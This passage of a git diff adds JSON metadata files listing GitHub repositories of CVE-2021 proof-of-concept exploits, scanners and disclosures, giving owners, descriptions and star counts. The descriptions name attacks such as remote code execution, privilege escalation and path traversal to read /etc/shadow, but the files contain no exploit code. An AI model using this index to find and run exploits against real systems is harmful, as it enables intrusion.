"2022-04-18T11:39:50Z", + "pushed_at": "2022-11-02T18:40:17Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44270.json b/2021/CVE-2021-44270.json new file mode 100644 index 0000000000..a8811df445 --- /dev/null +++ b/2021/CVE-2021-44270.json @@ -0,0 +1,33 @@ +[ + { + "id": 431144766, + "name": "CVE-2021-44270", + "full_name": "pinpinsec\/CVE-2021-44270", + "owner": { + "login": "pinpinsec", + "id": 94911442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94911442?v=4", + "html_url": "https:\/\/github.com\/pinpinsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pinpinsec\/CVE-2021-44270", + "description": "CVE-2021-44270", + "fork": false, + "created_at": "2021-11-23T15:04:23Z", + "updated_at": "2024-07-24T08:56:23Z", + "pushed_at": "2024-07-24T08:43:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-4428.json b/2021/CVE-2021-4428.json new file mode 100644 index 0000000000..715e438347 --- /dev/null +++ b/2021/CVE-2021-4428.json @@ -0,0 +1,33 @@ +[ + { + "id": 440457055, + "name": "Log4Shell", + "full_name": "CERT-hr\/Log4Shell", + "owner": { + "login": "CERT-hr", + "id": 42938844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42938844?v=4", + "html_url": "https:\/\/github.com\/CERT-hr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CERT-hr\/Log4Shell", + "description": "This repo contains IoCs which are associated with exploitation of CVE-2021-4428.", + "fork": false, + "created_at": "2021-12-21T09:17:08Z", + "updated_at": "2021-12-21T09:17:11Z", + "pushed_at": "2021-12-23T22:55:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44428.json b/2021/CVE-2021-44428.json new file mode 100644 index 0000000000..8c6ee6865c --- /dev/null +++ b/2021/CVE-2021-44428.json @@ -0,0 +1,33 @@ +[ + { + "id": 449086094, + "name": "log4jtest", + "full_name": "z3bul0n\/log4jtest", + "owner": { + "login": "z3bul0n", + "id": 97850188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97850188?v=4", + "html_url": "https:\/\/github.com\/z3bul0n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z3bul0n\/log4jtest", + "description": "Terraform and Docker resources for quickly spinning up a test of CVE-2021-44428", + "fork": false, + "created_at": "2022-01-18T00:09:11Z", + "updated_at": "2022-01-18T22:37:01Z", + "pushed_at": "2022-01-18T01:17:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44521.json b/2021/CVE-2021-44521.json new file mode 100644 index 0000000000..c0354ae446 --- /dev/null +++ b/2021/CVE-2021-44521.json @@ -0,0 +1,64 @@ +[ + { + "id": 463116248, + "name": "CVE-2021-44521", + "full_name": "WoodenKlaas\/CVE-2021-44521", + "owner": { + "login": "WoodenKlaas", + "id": 26481794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26481794?v=4", + "html_url": "https:\/\/github.com\/WoodenKlaas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WoodenKlaas\/CVE-2021-44521", + "description": "Automated PoC of CVE-2021-44521", + "fork": false, + "created_at": "2022-02-24T11:07:34Z", + "updated_at": "2023-04-18T06:06:57Z", + "pushed_at": "2022-02-24T12:04:40Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 573925245, + "name": "poc-CVE-2021-44521", + "full_name": "Yeyvo\/poc-CVE-2021-44521", + "owner": { + "login": "Yeyvo", + "id": 20130066, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20130066?v=4", + "html_url": "https:\/\/github.com\/Yeyvo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Yeyvo\/poc-CVE-2021-44521", + "description": "full PoC of CVE-2021-44521 ", + "fork": false, + "created_at": "2022-12-03T21:35:30Z", + "updated_at": "2024-08-15T11:13:25Z", + "pushed_at": "2022-12-03T21:44:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44529.json b/2021/CVE-2021-44529.json new file mode 100644 index 0000000000..af7a1b0900 --- /dev/null +++ b/2021/CVE-2021-44529.json @@ -0,0 +1,64 @@ +[ + { + "id": 473450134, + "name": "CVE-2021-44529", + "full_name": "jkana\/CVE-2021-44529", + "owner": { + "login": "jkana", + "id": 52318947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52318947?v=4", + "html_url": "https:\/\/github.com\/jkana", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jkana\/CVE-2021-44529", + "description": "CVE-2021-44529 PoC", + "fork": false, + "created_at": "2022-03-24T03:58:16Z", + "updated_at": "2023-12-30T17:41:58Z", + "pushed_at": "2022-03-24T04:07:34Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482288380, + "name": "CVE-2021-44529", + "full_name": "jax7sec\/CVE-2021-44529", + "owner": { + "login": "jax7sec", + "id": 102047728, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102047728?v=4", + "html_url": "https:\/\/github.com\/jax7sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jax7sec\/CVE-2021-44529", + "description": "CVE-2021-44529 Ivanti EPM 云服务设备 (CSA) 中的代码注入漏洞允许未经身份验证的用户以有限的权限(nobody)执行任意代码。", + "fork": false, + "created_at": "2022-04-16T15:19:39Z", + "updated_at": "2024-08-12T20:22:29Z", + "pushed_at": "2022-04-16T15:20:10Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44582.json b/2021/CVE-2021-44582.json new file mode 100644 index 0000000000..57b95d559b --- /dev/null +++ b/2021/CVE-2021-44582.json @@ -0,0 +1,33 @@ +[ + { + "id": 501963723, + "name": "CVE-2021-44582", + "full_name": "warmachine-57\/CVE-2021-44582", + "owner": { + "login": "warmachine-57", + "id": 51786945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51786945?v=4", + "html_url": "https:\/\/github.com\/warmachine-57", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/warmachine-57\/CVE-2021-44582", + "description": null, + "fork": false, + "created_at": "2022-06-10T08:32:28Z", + "updated_at": "2022-06-10T08:32:28Z", + "pushed_at": "2022-06-10T08:39:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44593.json b/2021/CVE-2021-44593.json new file mode 100644 index 0000000000..501699834b --- /dev/null +++ b/2021/CVE-2021-44593.json @@ -0,0 +1,37 @@ +[ + { + "id": 450413894, + "name": "CVE-2021-44593", + "full_name": "Mister-Joe\/CVE-2021-44593", + "owner": { + "login": "Mister-Joe", + "id": 16895391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16895391?v=4", + "html_url": "https:\/\/github.com\/Mister-Joe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mister-Joe\/CVE-2021-44593", + "description": "Public disclosure & writeup of CVE-2021-44593.", + "fork": false, + "created_at": "2022-01-21T08:36:25Z", + "updated_at": "2022-05-24T20:54:00Z", + "pushed_at": "2022-01-21T08:53:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2021-44593", + "cve", + "cve-2021-44593" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44731.json b/2021/CVE-2021-44731.json new file mode 100644 index 0000000000..d8af385506 --- /dev/null +++ b/2021/CVE-2021-44731.json @@ -0,0 +1,33 @@ +[ + { + "id": 664227496, + "name": "CVE-2021-44731-snap-confine-SUID", + "full_name": "deeexcee-io\/CVE-2021-44731-snap-confine-SUID", + "owner": { + "login": "deeexcee-io", + "id": 130473605, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130473605?v=4", + "html_url": "https:\/\/github.com\/deeexcee-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/deeexcee-io\/CVE-2021-44731-snap-confine-SUID", + "description": "Local Privilege Escalation Exploit for CVE-2021-44731", + "fork": false, + "created_at": "2023-07-09T10:06:29Z", + "updated_at": "2024-01-26T07:17:21Z", + "pushed_at": "2023-07-10T08:28:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44733.json b/2021/CVE-2021-44733.json new file mode 100644 index 0000000000..ffc19e8f45 --- /dev/null +++ b/2021/CVE-2021-44733.json @@ -0,0 +1,33 @@ +[ + { + "id": 441255365, + "name": "optee-qemu", + "full_name": "pjlantz\/optee-qemu", + "owner": { + "login": "pjlantz", + "id": 197917, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/197917?v=4", + "html_url": "https:\/\/github.com\/pjlantz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pjlantz\/optee-qemu", + "description": "Environment with vulnerable kernel for exploitation of the TEE driver (CVE-2021-44733)", + "fork": false, + "created_at": "2021-12-23T17:45:35Z", + "updated_at": "2024-04-17T06:23:32Z", + "pushed_at": "2021-12-28T07:57:13Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 74, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44790.json b/2021/CVE-2021-44790.json new file mode 100644 index 0000000000..530bf21b49 --- /dev/null +++ b/2021/CVE-2021-44790.json @@ -0,0 +1,33 @@ +[ + { + "id": 727568274, + "name": "-CVE-2021-44790", + "full_name": "nuPacaChi\/-CVE-2021-44790", + "owner": { + "login": "nuPacaChi", + "id": 127914517, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127914517?v=4", + "html_url": "https:\/\/github.com\/nuPacaChi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nuPacaChi\/-CVE-2021-44790", + "description": "Thực nghiệm CVE-2021-44790", + "fork": false, + "created_at": "2023-12-05T05:54:47Z", + "updated_at": "2024-06-24T12:07:35Z", + "pushed_at": "2023-12-05T17:08:39Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44827.json b/2021/CVE-2021-44827.json new file mode 100644 index 0000000000..388d9420f9 --- /dev/null +++ b/2021/CVE-2021-44827.json @@ -0,0 +1,33 @@ +[ + { + "id": 437843261, + "name": "CVE-2021-44827", + "full_name": "full-disclosure\/CVE-2021-44827", + "owner": { + "login": "full-disclosure", + "id": 62108425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62108425?v=4", + "html_url": "https:\/\/github.com\/full-disclosure", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/full-disclosure\/CVE-2021-44827", + "description": "A PoC for CVE-2021-44827 - authenticated remote code execution in Tp-link Archer C20i", + "fork": false, + "created_at": "2021-12-13T11:17:12Z", + "updated_at": "2022-03-29T07:23:25Z", + "pushed_at": "2022-03-02T16:36:54Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44832.json b/2021/CVE-2021-44832.json new file mode 100644 index 0000000000..bbdf0bcc88 --- /dev/null +++ b/2021/CVE-2021-44832.json @@ -0,0 +1,64 @@ +[ + { + "id": 442699680, + "name": "log4j_RCE_CVE-2021-44832", + "full_name": "cckuailong\/log4j_RCE_CVE-2021-44832", + "owner": { + "login": "cckuailong", + "id": 10824150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4", + "html_url": "https:\/\/github.com\/cckuailong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cckuailong\/log4j_RCE_CVE-2021-44832", + "description": null, + "fork": false, + "created_at": "2021-12-29T07:50:05Z", + "updated_at": "2022-02-11T09:28:41Z", + "pushed_at": "2021-12-29T07:54:47Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 442707396, + "name": "log4j-scanner", + "full_name": "name\/log4j-scanner", + "owner": { + "login": "name", + "id": 39627038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39627038?v=4", + "html_url": "https:\/\/github.com\/name", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/name\/log4j-scanner", + "description": "Discover Log4Shell vulnerability [CVE-2021-44832]", + "fork": false, + "created_at": "2021-12-29T08:22:41Z", + "updated_at": "2024-05-29T20:55:38Z", + "pushed_at": "2023-09-15T13:46:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44852.json b/2021/CVE-2021-44852.json new file mode 100644 index 0000000000..21b7a01744 --- /dev/null +++ b/2021/CVE-2021-44852.json @@ -0,0 +1,33 @@ +[ + { + "id": 617294533, + "name": "CVE-2021-44852", + "full_name": "CrackerCat\/CVE-2021-44852", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-44852", + "description": "An issue was discovered in BS_RCIO64.sys in Biostar RACING GT Evo 2.1.1905.1700. A low-integrity process can open the driver's device object and issue IOCTLs to read or write to arbitrary physical memory locations (or call an arbitrary address), leading to execution of arbitrary code. This is associated with 0x226040, 0x226044, and 0x226000.", + "fork": false, + "created_at": "2023-03-22T04:47:54Z", + "updated_at": "2023-11-16T14:20:25Z", + "pushed_at": "2023-03-22T04:13:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44906.json b/2021/CVE-2021-44906.json new file mode 100644 index 0000000000..6335a4153d --- /dev/null +++ b/2021/CVE-2021-44906.json @@ -0,0 +1,33 @@ +[ + { + "id": 699409932, + "name": "CVE-2021-44906", + "full_name": "nevermoe\/CVE-2021-44906", + "owner": { + "login": "nevermoe", + "id": 5752114, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5752114?v=4", + "html_url": "https:\/\/github.com\/nevermoe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nevermoe\/CVE-2021-44906", + "description": null, + "fork": false, + "created_at": "2023-10-02T15:20:35Z", + "updated_at": "2023-10-02T15:22:00Z", + "pushed_at": "2023-10-02T15:58:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44909.json b/2021/CVE-2021-44909.json new file mode 100644 index 0000000000..db85e04236 --- /dev/null +++ b/2021/CVE-2021-44909.json @@ -0,0 +1,33 @@ +[ + { + "id": 705463141, + "name": "CVE-2021-44909", + "full_name": "g1thub3r1st4\/CVE-2021-44909", + "owner": { + "login": "g1thub3r1st4", + "id": 141500233, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141500233?v=4", + "html_url": "https:\/\/github.com\/g1thub3r1st4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g1thub3r1st4\/CVE-2021-44909", + "description": "orangescrum 1.8.0 - Remote Command Execution RCE (unauthenticated)", + "fork": false, + "created_at": "2023-10-16T03:54:23Z", + "updated_at": "2023-10-16T07:47:24Z", + "pushed_at": "2023-10-16T04:38:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-44910.json b/2021/CVE-2021-44910.json new file mode 100644 index 0000000000..7a8b2d6b1d --- /dev/null +++ b/2021/CVE-2021-44910.json @@ -0,0 +1,33 @@ +[ + { + "id": 669553669, + "name": "CVE-2021-44910_SpringBlade", + "full_name": "W000i\/CVE-2021-44910_SpringBlade", + "owner": { + "login": "W000i", + "id": 86119333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86119333?v=4", + "html_url": "https:\/\/github.com\/W000i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W000i\/CVE-2021-44910_SpringBlade", + "description": "在21年,SpringBlade框架曾发现一个JWT认证的漏洞。尽管我们搜索了许多基于原理的扫描工具,但没有找到能够支持这个漏洞的工具。可能是因为这个漏洞相对冷门而不被广泛关注。", + "fork": false, + "created_at": "2023-07-22T16:48:24Z", + "updated_at": "2024-10-28T07:55:07Z", + "pushed_at": "2024-07-28T11:54:23Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45007.json b/2021/CVE-2021-45007.json new file mode 100644 index 0000000000..b0f4a9ed5a --- /dev/null +++ b/2021/CVE-2021-45007.json @@ -0,0 +1,33 @@ +[ + { + "id": 461231807, + "name": "CVE-2021-45007", + "full_name": "AS4mir\/CVE-2021-45007", + "owner": { + "login": "AS4mir", + "id": 65978029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65978029?v=4", + "html_url": "https:\/\/github.com\/AS4mir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AS4mir\/CVE-2021-45007", + "description": "Cross-Site Request Forgery", + "fork": false, + "created_at": "2022-02-19T15:28:59Z", + "updated_at": "2023-01-24T14:33:34Z", + "pushed_at": "2022-03-16T14:36:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45008.json b/2021/CVE-2021-45008.json new file mode 100644 index 0000000000..74d857643f --- /dev/null +++ b/2021/CVE-2021-45008.json @@ -0,0 +1,33 @@ +[ + { + "id": 461780034, + "name": "CVE-2021-45008", + "full_name": "AS4mir\/CVE-2021-45008", + "owner": { + "login": "AS4mir", + "id": 65978029, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65978029?v=4", + "html_url": "https:\/\/github.com\/AS4mir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AS4mir\/CVE-2021-45008", + "description": null, + "fork": false, + "created_at": "2022-02-21T09:00:38Z", + "updated_at": "2023-01-24T14:33:35Z", + "pushed_at": "2022-03-16T14:38:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45010.json b/2021/CVE-2021-45010.json new file mode 100644 index 0000000000..63579ded4d --- /dev/null +++ b/2021/CVE-2021-45010.json @@ -0,0 +1,95 @@ +[ + { + "id": 471389764, + "name": "CVE-2021-45010-TinyFileManager-Exploit", + "full_name": "febinrev\/CVE-2021-45010-TinyFileManager-Exploit", + "owner": { + "login": "febinrev", + "id": 52229330, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52229330?v=4", + "html_url": "https:\/\/github.com\/febinrev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/febinrev\/CVE-2021-45010-TinyFileManager-Exploit", + "description": "A Path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager Project’s Tiny File Manager <= 2.4.3 allows remote attackers with valid user accounts to upload malicious PHP files to the webroot and achieve code execution on the target server.", + "fork": false, + "created_at": "2022-03-18T14:00:03Z", + "updated_at": "2022-03-18T18:35:40Z", + "pushed_at": "2022-03-18T18:35:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 580199819, + "name": "CVE-2021-45010", + "full_name": "BKreisel\/CVE-2021-45010", + "owner": { + "login": "BKreisel", + "id": 1513073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4", + "html_url": "https:\/\/github.com\/BKreisel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BKreisel\/CVE-2021-45010", + "description": "🐍 Python Exploit for CVE-2021-45010", + "fork": false, + "created_at": "2022-12-20T00:47:30Z", + "updated_at": "2023-01-04T16:22:32Z", + "pushed_at": "2022-12-20T03:58:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 613526720, + "name": "CVE-2021-45010", + "full_name": "Syd-SydneyJr\/CVE-2021-45010", + "owner": { + "login": "Syd-SydneyJr", + "id": 127783310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127783310?v=4", + "html_url": "https:\/\/github.com\/Syd-SydneyJr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Syd-SydneyJr\/CVE-2021-45010", + "description": null, + "fork": false, + "created_at": "2023-03-13T18:40:02Z", + "updated_at": "2023-03-14T00:32:44Z", + "pushed_at": "2023-03-13T18:41:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45026.json b/2021/CVE-2021-45026.json new file mode 100644 index 0000000000..4d5131f5e9 --- /dev/null +++ b/2021/CVE-2021-45026.json @@ -0,0 +1,33 @@ +[ + { + "id": 436996683, + "name": "Zena-CVE-2021-45026", + "full_name": "JetP1ane\/Zena-CVE-2021-45026", + "owner": { + "login": "JetP1ane", + "id": 85408475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85408475?v=4", + "html_url": "https:\/\/github.com\/JetP1ane", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JetP1ane\/Zena-CVE-2021-45026", + "description": null, + "fork": false, + "created_at": "2021-12-10T13:55:33Z", + "updated_at": "2024-04-10T16:51:00Z", + "pushed_at": "2022-06-29T14:48:44Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45041.json b/2021/CVE-2021-45041.json new file mode 100644 index 0000000000..ceda6f1a67 --- /dev/null +++ b/2021/CVE-2021-45041.json @@ -0,0 +1,41 @@ +[ + { + "id": 442254323, + "name": "CVE-2021-45041", + "full_name": "manuelz120\/CVE-2021-45041", + "owner": { + "login": "manuelz120", + "id": 1948316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1948316?v=4", + "html_url": "https:\/\/github.com\/manuelz120", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manuelz120\/CVE-2021-45041", + "description": "PoC for CVE-2021-45041", + "fork": false, + "created_at": "2021-12-27T19:29:34Z", + "updated_at": "2022-11-09T18:14:54Z", + "pushed_at": "2021-12-27T21:07:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "owasp-top-10", + "python", + "security", + "sql-injection", + "sql-injection-proof", + "suitecrm" + ], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45043.json b/2021/CVE-2021-45043.json new file mode 100644 index 0000000000..197ef4e0cc --- /dev/null +++ b/2021/CVE-2021-45043.json @@ -0,0 +1,33 @@ +[ + { + "id": 438670323, + "name": "cve-2021-45043", + "full_name": "crypt0g30rgy\/cve-2021-45043", + "owner": { + "login": "crypt0g30rgy", + "id": 72516596, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72516596?v=4", + "html_url": "https:\/\/github.com\/crypt0g30rgy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/crypt0g30rgy\/cve-2021-45043", + "description": "HD-Network Real-time Monitoring System 2.0 allows ..\/ directory traversal to read \/etc\/shadow via the \/language\/lang s_Language parameter.", + "fork": false, + "created_at": "2021-12-15T15:01:31Z", + "updated_at": "2024-08-12T20:18:56Z", + "pushed_at": "2021-12-15T15:07:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-45046.json b/2021/CVE-2021-45046.json new file mode 100644 index 0000000000..3d170741d5 --- /dev/null +++ b/2021/CVE-2021-45046.json @@ -0,0 +1,319 @@ +[ + { + "id": 438510625, + "name": "Log4j_CVE-2021-45046", + "full_name": "cckuailong\/Log4j_CVE-2021-45046", + "owner": { + "login": "cckuailong", + "id": 10824150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10824150?v=4", + "html_url": "https:\/\/github.com\/cckuailong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cckuailong\/Log4j_CVE-2021-45046", + "description": "Log4j 2.15.0 Privilege Escalation -- CVE-2021-45046", + "fork": false, + "created_at": "2021-12-15T05:48:53Z", + "updated_at": "2024-07-12T01:46:39Z", + "pushed_at": 